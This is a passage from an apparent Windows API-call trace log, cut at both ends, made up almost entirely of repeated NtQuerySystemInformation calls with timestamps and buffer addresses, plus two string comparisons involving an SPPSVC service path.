ResultLength=0x0) [0209.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x48, ResultLength=0x0) [0209.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0209.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0209.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x48, ResultLength=0x0) [0209.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0209.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0209.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0209.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0209.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x50, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x50, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x50, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0209.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x28, ResultLength=0x0) [0209.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x28, ResultLength=0x0) [0209.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x28, ResultLength=0x0) [0209.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x28, ResultLength=0x0) [0209.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0209.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0209.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0209.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0209.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd560, Length=0x20, ResultLength=0x0) [0209.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0209.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0209.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0209.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0209.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd560, Length=0x20, ResultLength=0x0) [0209.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x20, ResultLength=0x0) [0209.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x20, ResultLength=0x0) [0209.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x50, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x50, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x50, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0209.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x28, ResultLength=0x0) [0209.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x28, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x28, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x28, ResultLength=0x0) [0209.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0209.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0209.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd560, Length=0x20, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd560, Length=0x20, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x20, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x20, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x28, ResultLength=0x0) [0209.649] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0209.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd740, Length=0x28, ResultLength=0x0) [0209.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0209.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0209.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0209.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x20, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x20, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x20, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x20, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x20, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x20, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x20, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x28, ResultLength=0x0) [0209.667] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0209.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0209.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0209.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0209.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd740, Length=0x28, ResultLength=0x0) [0209.676] NtQuerySystemInformation (SystemInformationClass=0xb9, 